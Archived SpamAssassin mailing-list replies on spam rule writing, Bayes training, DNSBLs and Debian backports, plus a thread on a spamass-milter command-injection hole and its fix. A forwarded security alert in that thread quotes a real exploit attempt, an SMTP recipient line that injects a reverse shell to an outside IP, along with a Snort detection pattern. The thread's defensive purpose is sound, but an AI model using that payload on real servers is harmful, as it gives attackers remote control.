 Despite its name, the AWL is a score averager, based on the sender's
 history (limited by net-block).

I encountered that misconception so often that I altered its description
in my local.cf:

describe AWL   Adjust score towards average for this sender

As a reminder, SVN trunk uses:

describe AWL   From: address is in the auto white-list


Even if we don't change what AWL means, we don't need to spell it out
as often.  Cleaning up the docs would certainly be useful, but simply
changing the description would cover most of the ground for us.





Re: low score for ($1.5Million)

2011-03-04 Thread Adam Katz
On 03/04/2011 04:11 PM, jdow wrote:
 Well, it IS a small number by Nigerian scam standards. So why not
 a small score?
 
 - She ran that way FAST{O,o}

Likewise, I also enjoy weekends:

http://i.imgur.com/cxX6t.jpg  (mildly NSFW, though it's on my cube)


Re: low score for ($1.5Million)

2011-03-03 Thread Adam Katz
On 03/03/2011 04:40 PM, Dennis German wrote:
 Can someone comment on the low score assigned to the email located at
 
 http://www.cccu.us/hundredThousand.txt
 
 X-Spam-testscores: AWL=1.086,BAYES_00=-2.599,HTML_MESSAGE=0.001,
 MILLION_USD=1.528
 
 Is my bayes broken?

Not broken so much as poorly trained ... you cannot rely upon
SpamAssassin's autolearn functionality to do even a half-decent job.
See the man page on sa-learn and consider using spamassassin -r in place
of sa-learn --spam.

As to the rest of that mail, here's what SA trunk had to say about it
(excluding T_ rules, formatted to 72 chars):


Content analysis details:   (19.1 points, 5.0 required)

 pts rule name              description
---- ---------------------- --------------------------------------------------
 0.0 FREEMAIL_FROM          Sender email is commonly abused enduser mail
                            provider
-0.0 RCVD_IN_DNSWL_NONE     RBL: Sender listed at http://www.dnswl.org/
 2.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in digit
 2.5 MILLION_USD            BODY: Talks about millions of dollars
 0.0 HTML_MESSAGE           BODY: HTML included in message
-0.1 DKIM_VALID_AU          Message has a valid DKIM or DK signature
 0.1 DKIM_SIGNED            Message has a DKIM or DK signature
-0.1 DKIM_VALID             Message has at least one valid DKIM
 1.0 HK_NAME_FM_MR_MRS      HK_NAME_FM_MR_MRS
 0.0 LOTS_OF_MONEY          Huge... sums of money
 3.5 FILL_THIS_FORM_LONG    Fill in a form with personal information
 1.0 MONEY_ATM_CARD         Lots of money on an ATM card
 0.0 FILL_THIS_FORM         Fill in a form with personal information
 2.8 FREEMAIL_REPLYTO       Reply-To/From or Reply-To/body contain different
                            freemails
 0.5 ADVANCE_FEE_3_NEW      Appears to be advance fee fraud
 1.0 ADVANCE_FEE_3_NEW_FORM Advance Fee fraud and a form
 1.0 ADVANCE_FEE_2_NEW_FRM_MNY Adv Fee fraud form and lots of money
 1.0 ADVANCE_FEE_3_NEW_FRM_MNY Adv Fee fraud form and lots of money
 1.0 ADVANCE_FEE_3_NEW_MONEY Advance Fee fraud and lots of money
 0.5 ADVANCE_FEE_2_NEW_MONEY Advance Fee fraud and lots of money
 0.4 FILL_THIS_FORM_FRAUD_PHISH Answer suspicious question(s)
 0.8 ADVANCE_FEE_2_NEW_FORM Advance Fee fraud and a form





Re: FRT_APPROV, FRT_EXPERIENCE FPs on French text

2011-02-28 Thread Adam Katz
On 02/28/2011 08:24 AM, Kris Deugau wrote:
 Mail reported by a customer as falsely tagged showed these rule hits.
 I've scored these rules down for now.
 
 Checking through the message text showed these likely matches:
 
 FRT_APPROV:approuvé
 
 FRT_EXPERIENCE:Expérience
 
 I'm pretty sure it's the accented 'e' in each word that's the trigger.

I agree.  I have fixed those two specific examples on SA trunk at svn
revision 1075489.

Please note that this sort of thing is better handled as a bug request,
and complaints directed at this list tend not to get such prompt
attention.  Try filing it in https://issues.apache.org/SpamAssassin/
next time.  (Final note:  it's better to note such a thing here than not
at all.)


 Given that, it's likely that similar rules will misfire on other
 French words that are essentially spelled the same as in English, but
 add a few accents on a vowel or two.

This does indeed seem likely.  Extra eyes from those of us versed in
non-English Latin-character languages would be quite helpful.

This could get you started:

grep -riE '^(raw|body|header.*subject).*\(\?![a-z?]{2,}\)' rules*

If you have GNU grep with libpcre, this is better (and colored):

grep --color -riP
  '^\s*(?:raw|body|header.*subject\s).*\(\?!\K[\w?]{2,}(?=\))' rules*

Use -h if you want to hide the file names.
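To see what that pattern catches, here is a self-contained toy run (the rule file and rule name are fabricated for illustration; the grep pattern is the one above):

```shell
# Fabricated one-rule file for demonstration only:
printf 'body FRT_DEMO /approv(?!al)/\n' > /tmp/rules.demo.cf

# Count rules containing a multi-letter negative lookahead:
grep -Ec '^(raw|body|header.*subject).*\(\?![a-z?]{2,}\)' /tmp/rules.demo.cf
# → 1
```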





Re: Should Emails Have An Expiration Date

2011-02-28 Thread Adam Katz
On 02/28/2011 12:53 PM, Gary Smith wrote:
 I think this would be a great idea.  Many end users never bother
 to delete old emails and on some, such as sales etc, there is no
 valid reason for them to continue to waste disk and server space.
 
 http://www.zdnet.com/news/should-emails-have-an-expiration-date/6197888

 No since emails are now a large part of business processes and those
 business processes become your basis for legal protected, allowing
 the sender to say x-delete: 24 hours and then sues you for
 something for which you no longer have any proof would cause
 significant global catastrophe.

I do like the idea with respect to alerts; if email programs (especially
those on smart phones) would know to avoid alerting you of unread +
expired messages, that could be quite beneficial.  Especially if I could
set expiration times with thunderbird filters.

This becomes immediately useful for systems like logwatch, nagios, and
hudson as well as manual things like "let's do lunch".


As to wasting space; I think this is never a valid excuse.  For
anything.  We are in an age of data parsing.  The more data, the better.
 Deleting things should be reserved for special cases, and forcing users
to delete things is never wise (especially given the ever-decreasing
cost of disk space).

Instead of deleting these things, there should be systems for
automatically recognizing them and shoving them into bins that would be
seen as acceptable losses if something were to go wrong (i.e. an area
disconnected from backups and excluded from searches by default).
Google's Priority Inbox is a great step in this direction.

Spam is a salient counter-example because it contains no value
whatsoever (well, unless you're in the spam-fighting business).
Anything else, even your aunt's all-caps derogatory jokes, has at least
a shred of value (it tells you she was awake at the time, the massive Cc
list might give you a relative's contact info, the absence of certain
people from the list might help determine when their falling-out
happened, etc).





Re: Decisions on how to handle mail from some domains

2011-02-25 Thread Adam Katz
On 02/23/2011 07:17 PM, Alex wrote:
 I'm wondering what people's opinion is on domains like 
 verticalresponse.com and vresp.com, and others, that seem to 
 distribute mail to anyone who wants to spend the money to buy a list 
 from them. Constantcontact might be in this same business, but it 
 seems like their reputation has slightly improved over the past few 
 months...
 
 While some of the mail from that sender seems legitimate, other mail 
 clearly isn't, but it has the same header as a legitimate mail,
 making it very difficult to properly train bayes or otherwise
 accurately determine that it's indeed spam and it should be
 discarded.
 
 I know this issue has been raised on this list before, but is there 
 any more information that people might have with regards to their 
 policy on mail such as this?

Those are called ESPs (Email Service Providers), and they vary from
complete spammers to companies that are genuinely trying to provide a
clean notification service.  Even the best of them fail at times, as has
been witnessed on this list.

Knujon has some unsubscribe voodoo in its reporting mechanism that can
probably help deal with the ESPs that try to be on the level.  The
others should hopefully fail to evade the DNSBLs.

To configure this within spamassassin, register for both knujon and
spamcop and configure your spamcop account to bcc knujon in its reports
(there are directions for this at knujon.org), then configure
spamassassin's spamcop plugin to use your spamcop account.  With this
set, each message you report with `spamassassin -r` will be reported to
spamcop and knujon (and Razor and Pyzor if they are enabled), and once
it hits knujon, you will be unsubscribed.





Re: Automatically extracted SpamAssassin FAQs

2011-02-23 Thread Adam Katz
(Professor Monperrus is Bcc'd)

On 02/22/2011 09:35 PM, Stefan Henß wrote:
 I'm currently doing research for my bachelor thesis on how to
 automatically extract FAQs from unstructured data.

Bravo, this is great work.  Release your work with a OSI-approved Free
Software license (I suggest the Affero GPL v3+) to encourage others to
follow your lead.  If you lose interest after your thesis completion or
you lose funding, this could save the project.

On 02/23/2011 05:54 AM, Alex responded:
 - How about a pointer to the original version, in case the reader
   wants to follow the whole thread?
 - How about a time/date stamp so users have an idea where it fits
   in context?

I would like to expand that:

There is a major issue here with blanket scraping of data without citing
your sources.  You need links to the original for further detail and to
assign credit, ideally to both the individuals involved as well as the
source (the list in our case).

Some of us get quite upset when our work is used without attribution.


Best of luck!





Re: using spamhaus droplist with sa ?

2011-02-22 Thread Adam Katz
Andreas Schulze began:
 http://www.spamhaus.org/faq/answers.lasso?section=DROP+FAQ 
 mention as very last point to use the Spamhaus Drop list with
 SA.

Yet Another Ninja continued:
 DROP is a tiny subset of the SBL designed for use by firewalls
 and routing equipment.
 
 Using it postqueue is pretty pointless as its basically a safe 
 subset of SBL

RW added:
 The suggestion is that it be scored higher for that reason.

 is anybody doing this and can explain it in detail ?

Yet Another Ninja answered:
 if that is what you wish, you can setup a local rbldnsd zone and
 query that.

That's nontrivial since there is no DNSBL serving it.  Setting one up
requires regularly scraping that data.  The same would go if you were to
create a SpamAssassin rule from it.

As a proof-of-concept, I have done the latter and added it as
KHOP_SPAMHAUS_DROP and KHOP_SPAMHAUS_DROP_LE (which checks only the
last-external relay) to my data-scraping sa-update channel
khop-sc-neighbors for testing.  It only runs in certain circumstances
and is scored very low as it's still testing.  The resulting rule
contains a 5817-char regexp (from 3632 IP addresses in 402 CIDRs from a
6311-char source), which is more than twice the size of KHOP_SC_TOP200,
the channel's previously longest entry; twice the space for twice the
entries (18x the IPs).

Like KHOP_SC_TOP200, I optimized for performance by scoring it zero
(skipping its evaluation) in the presence of DNSEval:

score KHOP_SPAMHAUS_DROP 0.5 0 0.5 0
if (! plugin(Mail::SpamAssassin::Plugin::DNSEval) )
  score KHOP_SPAMHAUS_DROP (0) (0.3) (0) (0.1)
endif

I've had this sitting in SVN for a few days now.  It hits almost
nothing, but it is actually interesting; only 72% of the broader rule's
hits are mirrored in RCVD_IN_SBL.  The _LE rule has 93% overlap with SBL
(I was expecting 99+%).

The biggest surprise was that both rules have almost their entire score
map matching corpus messages at or under 8 points.

   Corpus T_KHOP_SPAMHAUS_DROP T_KHOP_SPAMHAUS_DROP_LE
DateRev #spam  spam%  ham%  s/o rank SBL%  spam% ham%   s/o rank SBL%
20110221 576k  .0323 .0030 .914  .54  72   .0217    0 1.000  .52  93
20110220 599k  .0314 .0031 .911  .54  72   .0209    0 1.000  .53  93
20110219 176k  .0996 .0041 .960  .55  72   .0660    0 1.000  .53  93
20110218 595k  .0315 .0031 .910  .54  72   (not added yet)

PMCs:  I'd love to see the timing.log output so as to better measure
these rules' merit.  Actually, why isn't that data public on ruleqa?  If
it's too time-consuming, restrict it to the weekly network runs.






Re: Tonns of russian DOT info spam

2011-02-21 Thread Adam Katz
On 02/20/2011 08:22 AM, Michelle Konzack wrote:
 http://www.electronica.tamay-dogan.net/spamassassin/

You need to train bayes.  Those messages all hit BAYES_00 when they
should be somewhat consistently hitting BAYES_80 or higher (after you
begin training them).  If you are not prepared to do this, you must
disable it as it is harming you in its current state.  If you are
prepared, wipe your bayes database and start from scratch, training as
much as possible.

Also, somewhere in your mail processing (maybe on Debian's side?), there
is an Amavisd-new scan which uses Razor2, showing us that these messages
are mostly registered there.  Enable the Razor2 plugin.

 RCVD_IN_DNSWL_MED 4.0
 
 Not very funny.

I'm not sure what you mean by this, but the default score should be -2.3
from this line:

score RCVD_IN_DNSWL_MED 0 -2.3 0 -2.3

If you let that go back to its default, train bayes, and configure
Razor2, you should be able to catch most if not all of that spam without
any of the potentially harmful measures you're considering.

Also, that DNSWL hit, which refers to the Debian mailing list itself,
can go away if you put 82.195.75.100 in your trusted_networks, though I
do not recommend that unless you also define your internal_networks (and
exclude it from there) since internal_networks otherwise defaults to
copying your trusted_networks.  There is some controversy in doing this,
but I'll leave others to describe it if they think it's important.
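A minimal sketch of that configuration, assuming you want the list relay trusted but not internal (the internal_networks value below is a placeholder for your own relays, not a recommendation):

```
trusted_networks  82.195.75.100   # the Debian list server from this thread
internal_networks 192.0.2.0/24    # placeholder: replace with your own relays
```

Defining internal_networks explicitly stops it from defaulting to a copy of trusted_networks.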

 Now I have increased URIBL_RHS_DOB to 5.0 because  I  do  not  know  a
 single serious website which was registered and gone immediately online.

Not at the moment, but that's not something you check.  There is a
reason that rule is not scored very high.  Even URIBL_BLACK, which is
highly trusted, is only scored 1.8, so I would strongly suggest not
exceeding that mark, even if you are so convinced.

If you still want a custom rule, this should do:

header   __LISTID_DEBIAN  List-Id =~ /\.lists\.debian\.org/
body     __RAJONAA_INFO   m' rajonaa: http://www\.[\w-]{0,50}\.info !$'
meta     DEB_RAJONAA      __LISTID_DEBIAN && __RAJONAA_INFO
describe DEB_RAJONAA      Latvian text with .info URI on Debian List
score    DEB_RAJONAA      3.0

Google translate seems to think the language is Latvian, but it does not
have a translation for the word "rajonaa".  An online search shows that
it is used to indicate links on occasion, so we still need more context.

I've added this to my sandbox as well.





Re: Tonns of russian DOT info spam

2011-02-18 Thread Adam Katz
On 02/18/2011 01:46 PM, Michelle Konzack wrote:
 Since three weeks the Debian Mailinglist are hit be several 1000 russian
 DOTinfo spams and spamassassin score this crap with -4
 
 Does someone have a working rule for this crap?
 
 I tried :
 
 describe TD_INFO   dot info spam
 body __TD_INFO /http:\/\/.*\.info/i
 score    TD_INFO   4.0
 
 but it does not work.

And thank goodness for that, your rule is WAY too broad to be useful
as it blocks the ENTIRE .info top-level domain (a very bad idea).

If you really want to do something that bold, at least limit it to the
debian list (note, that list-id is a guess, check your headers):

header __TD_DEB_LISTList-Id =~ /debian-user.lists.debian.org/
uri__TD_DOT_INFOm'^http://[^/]*\.info[/:?#]'i
meta   TD_DEB_INFO  __TD_DEB_LIST && __TD_DOT_INFO
score  TD_DEB_INFO  1.0

Check the SA rules it hits and add them as dependencies to that meta if
you want to increase the score; if it previously got a -4 score, it had
to hit some rule to do that.

Again, even this safer rule seems to be the wrong approach.  I suspect
you have a custom rule that is the source of the problem.  Can you post
the offending message to a pastebin?  The scoring breakdown would also
be useful (re-run the message with `spamassassin -t filename`)





Re: Tonns of russian DOT info spam

2011-02-18 Thread Adam Katz
 If you really want to do something that bold, at least limit it to the
 debian list (note, that list-id is a guess, check your headers):

 header __TD_DEB_LIST List-Id =~ /debian-user.lists.debian.org/
 uri__TD_DOT_INFO m'^http://[^/]*\.info[/:?#]'i

On 02/18/2011 02:55 PM, Karsten Bräckelmann wrote:
 Way better. And actually a uri rule. :)  It's missing a bare domain URI,
 though. The end of the domain part sub-RE alternatively should accept
 the end of the string.
 
   / ... \.info(?:[/:?#]|$)/

If you're going to nit-pick, I'll correct its other minor bugs too:

header __TD_DEB_LISTList-Id =~ /debian-user\.lists\.debian\.org/
uri__TD_DOT_INFOm'^http://[^/:?#]*\.info(?:[/:?#]|$)'i

:-p





Re: Tonns of russian DOT info spam

2011-02-18 Thread Adam Katz
 Ah, good one. Though unfortunately, and I hate to admit that, both our
 rules will never match. The # hash needs to be escaped... *sigh*
 
   [/:?\#]
 
 Or just ignore it by leaving it out. It's pretty rare, anyway.

Hash (#), like At (@) and sometimes Dollar ($), is handled
inconsistently by the SA parser.  When in doubt, escape it, but I
believe it is correctly parsed when delimited with m''.

The issue with $ is moot in m//, but m'foo$' and several other
punctuation-based delimiters trigger various obscure perl variables,
which I believe include  $'  $&  $`  $+   ... A workaround is to use \Z
(which is usually the same thing) or (?:$) or a different delimiter.





Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-14 Thread Adam Katz
On 02/12/2011 05:19 PM, Sahil Tandon wrote:
 On Fri, 2011-02-11 at 12:08:35 -0800, Adam Katz wrote:
 
 I consider it a mission-critical component to be able to deliver a
 rejection notice at SMTP-time (to avoid backscatter from an emailed
 bounce message).  The other systems out there (specifically amavis and
 mailscanner) just can't do this while spamass-milter does it with very
 little overhead or configuration.
 
 For posterity, and to hopefully prevent the spread of misinformation via
 list archives, the above (specifically with regard to amavisd-new) is
 patently false.

Thanks for the correction to Mark, Henrik, and Sahil.  I did not know
that.  I also did not know about amavisd-milter.  These either weren't
around a few years ago or they were not found when I researched this
(including questions to irc.freenode.net#amavisd or whatever that
channel is named).

My apologies, I was not trying to propagate misinformation.





Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-11 Thread Adam Katz
On 02/11/2011 03:39 AM, Giles Coochey wrote:
 Under CentOS spamass-milter appears to run as sa-milt.

IIRC, Debian does this too.  However, the -x flag may require running as
root, so it is possible (I have not verified) that it never downgrades
its privileges.

 The Vulnerability is only active if the milter is run with the '-x' 
 expand (for virtusertable / alias expansion) option.

Correct.

 While the project page is inactive, the distribution packages of 
 spamass-milter often contain unofficial patches which expand its 
 features, and wouldn't surprise me if they also fix this
 vulnerability.

They did.  That fix was also supposed to go upstream but accidentally
did not.

 Anyone know whether the CentOS one is vulnerable?
 
 Name   : spamass-milter
 Arch   : i386
 Version: 0.3.1
 Release: 24.rhel5

You are all set.

RHEL release 0.3.1-17 introduced the fix.  0.3.1-19 includes a related
zombie process fix (CVE-2010-1132).  See changelog in:
http://rpmfind.net//linux/RPM/fedora/devel/rawhide/i386/spamass-milter-0.3.1-24.fc15.i686.html#Changelog





Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-11 Thread Adam Katz
On 02/10/2011 03:41 PM, Warren Togami Jr. wrote:
 On 2/10/2011 1:29 PM, John Hardin wrote:
 I suppose we ought to compose a boilerplate response for the
 inevitable visitors who will show up asking about this exploit in
 SpamAssassin...
 
 Perhaps more than boilerplate, but rather an official advisory to
 clear up the confusion?  Given that upstream of that milter is dead,
 nobody else will make an official advisory?

This came from an accidental lost checkin that has since been fixed.
There is little activity on the spamass-milter project because it
doesn't need anything; almost all updates go to SA and the MTAs rather
than the milter.

As noted by Robert Schetterer, postfix doesn't allow this syntax
anymore.  As Giles Coochey forwarded from the sa-milter list, maintainer
Dan Nelson has committed the patch to CVS and will officially release
the fix this weekend.  I'm one of several people who have mentioned that
this is fixed in both Fedora- and Debian- derived systems.

There appears to be a communication issue between these two lists; once
I connected the SA list to the SA-milter list, the issue got resolved in
very quick order.  SA-milter is still one of the best methods for
invoking SA from sendmail or postfix.

I consider it a mission-critical component to be able to deliver a
rejection notice at SMTP-time (to avoid backscatter from an emailed
bounce message).  The other systems out there (specifically amavis and
mailscanner) just can't do this while spamass-milter does it with very
little overhead or configuration.

I've considered working on boosting the support for SA in
milter-greylist (my C is 5-10+ years rusty and my free time is sparse),
but most people have a hard time understanding that you can use that
milter without greylisting -- it does all sorts of useful things at
SMTP-time (before and after DATA), including SPF, DKIM, DNSBLs,
tarpitting, spamassassin (limited), p0f, and greylisting.

Notes on SA support in Milter-Greylist:
http://tech.groups.yahoo.com/group/milter-greylist/message/5621
(Tip for evading Yahoo's cookies: set User-Agent to "Googlebot/2.1")





Re: channel 70_zmi_german.cf.zmi.sa-update.dostech.net update?

2011-02-11 Thread Adam Katz
On 02/11/2011 06:53 AM, Bowie Bailey wrote:
 The khop rules should probably be added to that list.

 The only official site I could find referencing these rules is 
 http://khopesh.com/wiki/Anti-spam (under the sa-update channels 
 heading), but this also has some out of date information regarding
 the SARE rules.

The 2tld stuff, yeah.  I need to note that that's not useful in
sa3.3.0+.  I'm pretty sure everything is otherwise up to date.





Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Adam Katz
Copying the spamass-milter mailing list.

On 02/10/2011 09:42 AM, Michael Scheidell wrote:
 in case you are using spamassassin milter:
 
 active exploits going on.
 
 http://seclists.org/fulldisclosure/2010/Mar/140
 http://www.securityfocus.com/bid/38578
 
 Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
 
 I don't see anything on bugtraq about a fix.

On 02/10/2011 10:21 AM, David F. Skoll wrote:
 Aieee popen() in security-sensitive software!??!??
 
 Also, why does the milter process run as root?  That seems like a huge
 hole all by itself.


Does this affect sendmail as well as postfix?  I assume so, but wanted
an explicit confirmation.  (I am no longer managing an environment that
uses this milter and therefore cannot verify myself.)
---BeginMessage---

heads up:

in case you are using spamassassin milter:

active exploits going on.

http://seclists.org/fulldisclosure/2010/Mar/140
http://www.securityfocus.com/bid/38578

Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.


 Original Message 
Subject: 	RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt

The rule is only looking for this:

content:"to|3A|"; depth:10; nocase; content:"+|3A|\|7C|";

Personally, I would probably block it.  Although, if we're not seeing 
this sort of thing pop up on customer's boxes, a manual block in 
scanner2 is sufficient for now, right?


Either way, let me know and I'll block/unblock/leave alone.

--

John Meyer

Associate Security Engineer


|SECNAP Network Security


Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*Michael Scheidell
*Sent:* Thursday, February 10, 2011 12:25 PM
*To:* John Meyer
*Cc:* Jonathan Scheidell; Anthony Wetula
*Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt


is the snort rule specific enough that you can block the offending ip 
for 5 mins?


(if it's a real SMTP server, it will retry) and let legit email through.



On 2/10/11 12:12 PM, John Meyer wrote:

I don't like the looks of this.  I blocked that IP with samtool.

Payload:

rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"

data

.

quit


*From:*SECNAP Network Security
*Sent:* Thursday, February 10, 2011 12:01 PM
*To:* security-al...@scanner2.secnap.com
*Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt


02/10-12:00:59 trust1 TCP 62.206.228.188:56691 -> 10.70.1.33:25
[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote 
Arbitrary Command Injection Attempt

[Classification: Attempted User Privilege Gain] [Priority: 1]

--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300

*| *SECNAP Network Security Corporation


---End Message---




FIX for ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2011-02-10 Thread Adam Katz
On 02/10/2011 09:42 AM, Michael Scheidell wrote:
 active exploits going on.
 
 http://seclists.org/fulldisclosure/2010/Mar/140
 http://www.securityfocus.com/bid/38578
 
 Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
 
 I don't see anything on bugtraq about a fix.

The fix (to use popenenv in place of popen) has been noted on the
spamass-milter list.  It was released downstream by both Red Hat and
Debian in March 2010:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=573228

I've attached the current diff from Debian (note it includes everything,
including the debian/ subdirectory, rather than just that one issue).


... Why is Amavis here for the ride?  They don't use spamass-milter!


spamass-milter_0.3.1-10.diff.gz
Description: GNU Zip compressed data




Re: Updated rules are not regarded

2010-06-04 Thread Adam Katz
On 05/29/2010 05:03 AM, Yves Goergen wrote:
 Stepping away from the ZMI issue and headig towards the larger 
 picture, what kind of spam are you trying to nail down with this 
 ruleset?  What goals did you hope to meet with the ZMI rules?  If
 it's a specific type of spam, can you pastebin an example so we
 can help you more directly?
 
 I have submitted a couple of those spam messages to the ruleset 
 maintainer, but I'm not sure if it helps. I can repost it here if
 you like to see it. (ZIP 48 kB)

If they're evading bayes and other filters, they might be worth a
look.  I can take a look at them if you post them to pastebin.com or a
similar site and then send me links (this is the best way to avoid
spam filters on the list, etc).

 Are you using Bayes?  Are you training it?
 
 Yes. Yes. I'm only training it with spam messages though. I assume
 it autolearns all the rest. But the bayes filter is absolutely
 useless to me, it most often rates spam 0-1%, even for repeatedly
 learned spam messages. Maybe I should erase the bayes brain and
 restart from new?

Bayes won't work unless you have lots of both spam and ham.  Autolearn
is apparently not doing its job if most of your spams hit 0-1%.  Try
teaching it everything you have.  If you're that out of whack, it
might be worthwhile to start from scratch as you suggested.

 Most people who want to improve their deployment's SA filters
 aren't properly utilizing the various plugins.  Specifically,
 DNSBLs, URIBLs, and Bayes, but also things like Razor2, DCC (if
 legal), and Pyzor.
 
 The very most helpful plugin to me is Botnet. It detects most spam
 and rates 5 points which is often a big step towards rejection.

I've heard good things about Botnet, though most of its dynamic checks
appear to already be folded into SA's trunk (I've actually got some
detection rules in there that are more sophisticated but are not yet
done cooking).

That said, the dynamic detection bits like Botnet should pale in
comparison to any one of: DNSBLs, URIBLs, Bayes, Razor2, DCC, and
Pyzor.  Almost every case I encounter with this sort of "help me make
SA filter better" request ends up being a misconfiguration of some or
all of those things.

 Most other SA rules don't detect anything although I'm running
 sa-update daily and it reports an update every few weeks. Only the
 DNSBL rules apply every once in a while - at least to what is
 passing the filter. I haven't investigated what's been blocked
 successfully. I think I've still installed the Image Info thing
 plugin but I don't think it catches anything these days. Image spam
 seems to be over.

DNSBLs do a good job; you're probably not noticing them because
anything they nail gets hit pretty hard by several rules and thus
probably hits your block threshold.

Image spam comes and goes.  Third party plugins like iXhash can help.

 Upgrading to SA 3.3.1 would be a big step up if you're not there 
 already (if you can't, you might want to consider a back-port of
 the better DNSBLs to SA 3.2.x like my khop-bl channel).
 
 I need to upgrade to SA 3.3, true. It's always been a hassle
 somewhere between CPAN, other dysfunctional Perl junk, source code
 and Debian packages... It's a very complicated job. I'm also
 considering setting up the entire machine anew on Ubuntu basis and
 only use platform packages but that's not something I can do in the
 near future.

Messing with CPAN will work, but might feel daunting, especially if
you've never done it before.  It also introduces an additional thing
to keep track of.  For Debian, I recommend the volatile and backports
repositories.  Go to www.backports.org and add lenny-backports, then
pin it to a low priority and un-pin spamassassin.


Package: *
Pin: release a=lenny-backports
Pin-Priority: 150

Package: spamassassin
Pin: release a=lenny-backports
Pin-Priority: 500


I've also got testing and unstable pinned even lower at 1 and -1, but
that's up to you.  500 is the default pin, 101-500 will upgrade a
manually-installed newer package if there is a candidate, 1-100 will
install candidates if higher pin versions are missing, and lower pins
are never installed.  See the man page for apt_preferences for detail.


# apt-cache policy spamassassin
spamassassin:
  Installed: 3.2.5-2+lenny1.1~volatile1
  Candidate: 3.3.1-1~bpo50+1
  Package pin: 3.3.1-1~bpo50+1
  Version table:
 3.3.1-1 500
  1 http://debian.lcs.mit.edu/debian/ squeeze/main Packages
 -1 http://debian.lcs.mit.edu/debian/ unstable/main Packages
 3.3.1-1~bpo50+1 500
150 http://www.backports.org lenny-backports/main Packages
 3.2.5-2+lenny2 500
500 http://debian.lcs.mit.edu/debian/ lenny/main Packages
 3.2.5-2+lenny1.1~volatile1 500
500 http://volatile.debian.org lenny/volatile/main Packages
# aptitude install spamassassin
...


Re: Yerp connection issues

2010-05-26 Thread Adam Katz
On 05/26/2010 07:32 PM, John Hardin wrote:
 On Wed, 26 May 2010, Karsten Bräckelmann wrote:
 
 The correct answer to both these statements is -- because it is in the
 mirrors list. ;)

 $ lynx -dump http://yerp.org/rules/MIRRORED.BY
 http://yerp.org:8080/rules/stage/ weight=10
 http://yerp.org/rules/stage/
 
 ...a botched attempt to set up Coral caching? It seems to me that should
 probably be:
 
  http://yerp.org.nyud.net:8080/rules/stage/ weight=10
  http://yerp.org/rules/stage/

I do not suggest that.  Coral Cache does not play nicely with sa-update
from my experiences (I seem to recall Justin saying the same a while ago).

Since yerp is Justin's, I presume it's a different sort of experiment.


Re: Updated rules are not regarded

2010-05-25 Thread Adam Katz
Please note that the ZMI German rules are very old, and while there
have been a few recent tweaks to the file, it doesn't look terribly
useful to any system that uses the Bayesian filter (more on this
later).  I would expect these rules to fire quite rarely, even in
environments that have lots of German-language mail.


Yves added ZMI via sa-update channels.  He confirmed its presence in
the correct area but wants to confirm it can run.

This command will tell you if SA is properly loading the configuration
file (this should note loading the ZMI rules):

  spamassassin --lint -D config 2>&1 | grep zmi_german

You can run lint without debug to see if SA takes issue with any of
the rules (no output means you're good):

  spamassassin --lint

Next, let's see if the rules are ever triggering.  This is merely a
question of filtering your logs (assuming SA is properly logged).

To do this, we'll first verify that there is the expected data your
logs and see how many messages SA scanned in this sampling period:

  zgrep -c 'spamd: result:' /var/log/mail.log*

Now let's look for rules from ZMI.  Since this rule set uses a common
prefix for all rules, this is an easy search:

  zgrep -c 'spamd: result: .*ZMI' /var/log/mail.log*

I expect the results of the last two scans to be a very high number
for the total scanned message count and then a very low number (like
zero) for the ZMI-hitting message count.


For completeness, here's how to actually grab rules by name (in any
posix/bourne shell like bash but not like tcsh):

  RULES=`egrep '^ *score' 70_zmi_german.cf |awk '{printf $2 "|"}'`

  zgrep -cE "spamd: result: .*(${RULES%?})" /var/log/mail.log*
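A runnable miniature of that rule-name pipeline against a fabricated ruleset file (the file and rule names are invented):

```shell
printf 'score ZMI_A 1.0\nscore ZMI_B 2.0\n' > /tmp/zmi.demo.cf

# Build a RULE_A|RULE_B alternation, trimming the trailing "|":
RULES=$(egrep '^ *score' /tmp/zmi.demo.cf | awk '{printf $2 "|"}')
echo "(${RULES%?})"
# → (ZMI_A|ZMI_B)
```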


Finally, if you believe that the rules are being ignored, you can
compose a test to see if that is actually the case.  Take a *full*
sample spam and feed it into SA with a replaced subject as a test:

  formail -I "Subject: NLP Profis" < message.txt | spamassassin -t

You should see (among other things) a line noting that
ZMIde_SUBNLP_PROFI has been hit.


Stepping away from the ZMI issue and heading towards the larger
picture, what kind of spam are you trying to nail down with this
ruleset?  What goals did you hope to meet with the ZMI rules?  If it's
a specific type of spam, can you pastebin an example so we can help
you more directly?

Returning to my initial statement, I am under the impression that this
channel is useful only to victims of German spams who do not use
Bayes.  From a quick examination of the rules, it appears to be mostly
geared at SA implementations that cannot run Bayesian filters, since
Bayes should be fully capable of catching everything those rules catch
(possibly excepting ZMISOBER_P_SPAM due to its examination of several
non-word elements) ... and Bayes should do a better job, too.

Are you using Bayes?  Are you training it?

Most people who want to improve their deployment's SA filters aren't
properly utilizing the various plugins: chiefly DNSBLs, URIBLs, and
Bayes, but also things like Razor2, DCC (if legal), and Pyzor.
Upgrading to SA 3.3.1 would be a big step up if you're not there
already (if you can't, you might want to consider a back-port of the
